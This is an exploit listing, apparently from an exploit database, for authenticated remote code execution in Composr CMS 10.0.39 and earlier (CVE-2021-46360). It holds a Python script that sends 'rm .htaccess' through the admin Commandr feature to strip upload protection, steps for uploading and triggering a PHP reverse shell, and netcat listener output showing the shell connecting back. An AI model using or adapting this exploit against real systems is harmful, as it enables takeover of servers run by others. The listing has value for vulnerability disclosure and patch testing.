Composrcms version <=10.0.39 authenticated remote code execution Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2023-03-25 |
Type : webapps |
Platform : php
This exploit / vulnerability Composrcms version <=10.0.39 authenticated remote code execution is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Composr-CMS Version <=10.0.39 - Authenticated Remote Code Execution
# Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane)
# Date: 12th January,2022
# CVE ID: CVE-2021-46360
# Confirmed on release 10.0.39 using XAMPP on Ubuntu Linux 20.04.3 LTS
# Reference: https://github.com/sartlabs/0days/blob/main/Composr-CMS/Exploit.py
# Vendor: https://compo.sr/download.htm
###############################################
#Step1- We should have the admin credentials, once we logged in, we can disable the php file uploading protection, you can also do this manually via Menu- Tools=>Commandr
#!/usr/bin/python3
import requests
from bs4 import BeautifulSoup
import time
cookies = {
'has_cookies': '1',
'PHPSESSID': 'ddf2e7c8ff1000a7c27b132b003e1f5c', #You need to change this as it is dynamic
'commandr_dir': 'L3Jhdy91cGxvYWRzL2ZpbGVkdW1wLw%3D%3D',
'last_visit': '1641783779',
'cms_session__b804794760e0b94ca2d3fac79ee580a9': 'ef14cc258d93a', #You need to change this as it is dynamic
}
params = (
('keep_session', 'ef14cc258d93a'), #You need to change this as it is dynamic
)
data = {
'_data': 'command=rm .htaccess', # This command will delete the .htaccess means disables the protection so that we can upload the .php extension file (Possibly the php shell)
'csrf_token': 'ef14cc258d93a' #You need to change this as it is dynamic
}
#Step2- Now visit the Content=>File/Media Library and then upload any .php web shell (
#Step 3 Now visit http://IP_Address/composr-cms/uploads/filedump/php-reverse-shell.php and get the reverse shell:
┌─[ci@parrot]─[~]
└──╼ $nc -lvvnp 4444
listening on [any] 4444 ...
connect to [192.168.56.103] from (UNKNOWN) [192.168.56.116] 58984
Linux CVE-Hunting-Linux 5.11.0-44-generic #48~20.04.2-Ubuntu SMP Tue Dec 14 15:36:44 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
13:35:13 up 20:11, 1 user, load average: 0.00, 0.01, 0.03
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
user :0 :0 Thu17 ?xdm? 46:51 0.04s /usr/lib/gdm3/gdm-x-session --run-script env GNOME_SHELL_SESSION_MODE=ubuntu /usr/bin/gnome-session --systemd --session=ubuntu
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
daemon
$ id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
$ pwd
/
$
Composrcms version <=10.0.39 authenticated remote code execution